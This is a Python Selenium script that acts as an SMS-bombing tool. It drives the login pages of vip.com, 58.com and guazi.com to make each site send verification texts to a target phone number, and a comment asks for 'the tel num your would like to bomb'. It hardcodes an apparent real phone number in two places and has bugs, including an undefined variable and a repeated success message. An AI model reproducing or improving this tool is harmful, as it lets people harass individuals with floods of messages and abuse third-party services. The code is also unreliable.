import selenium
import random
from selenium import webdriver
import time

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def viphui(tel):
    url = r'https://passport.vip.com/login'
    try:
        driver = webdriver.Chrome()
        driver.get(r"https://passport.vip.com/login")
        driver.find_element_by_xpath('/html/body/div[2]/div/div[1]/div[1]/div/div[1]/div[2]').click() #点击 账户登录
        # 点击 短信验证登录
        driver.find_element_by_xpath('//html/body/div[2]/div/div[1]/div[1]/div/div[2]/div[2]/div[1]/div/div[5]/div/div/div[1]/a').click() 
        #input phone num
        driver.find_element_by_xpath('/html/body/div[2]/div/div[1]/div[1]/div/div[2]/div[2]/div[2]/div/div[2]/div[1]/input').send_keys(tel)
        #click get codes
        driver.find_element_by_xpath('/html/body/div[2]/div/div[1]/div[1]/div/div[2]/div[2]/div[2]/div/div[4]/div[1]/a').click()
        print('唯品会短信发送成功')
    except Exception as e:
        print(e)
    
    

def tongcheng(tel):
    url= r'https://passport.58.com/login' 
    try:
        driver.get(url) 
        driver.find_element_by_xpath(r'//*[@id="mask_body"]/div[2]/div[1]/span[2]').click() #手机动态码登录  点击
        driver.find_element_by_xpath(r'//*[@id="mask_body_item_phonenum"]').send_keys('13763338281')#input phone num
        driver.find_element_by_xpath(r'//*[@id="mask_body_item_getcode"]').click() #click to get text codes
        print('58同城短信发送成功')
    except Exception as e:
        print(e)  
    

def guazi(tel):
    url= r'https://www.guazi.com/dg/' 
    try:
        try:
            driver.find_element_by_xpath(r'/html/body/div[5]/a[2]').click() #点击关闭安全提示
        except Exception as e:
            print(e)
        driver.find_element_by_xpath(r'/html/body/div[6]/div[1]/div/div[2]').click() #点击登录 
        driver.find_element_by_xpath(r'/html/body/div[6]/div[2]/form/ul/li[1]/input').send_keys('13763338281') #输入手机号 
        driver.find_element_by_xpath(r'/html/body/div[6]/div[2]/form/ul/li[2]/button').click() #click to get text codes
        print('58同城短信发送成功')
    except Exception as e:
        print(e)
        
        
if __name__ == '__main__':
    driver = webdriver.Chrome()
    #tel = input('please input the tel num your would like to bomb \n')
    viphui(tel)
    tongcheng(tel)
    guazi(tel)
    discount = random.randint(61,70)
    for i in range(discount, 0, -1):
            print("\r", "下一次发送倒计时{}秒！".format(i), end="", flush=True)

            
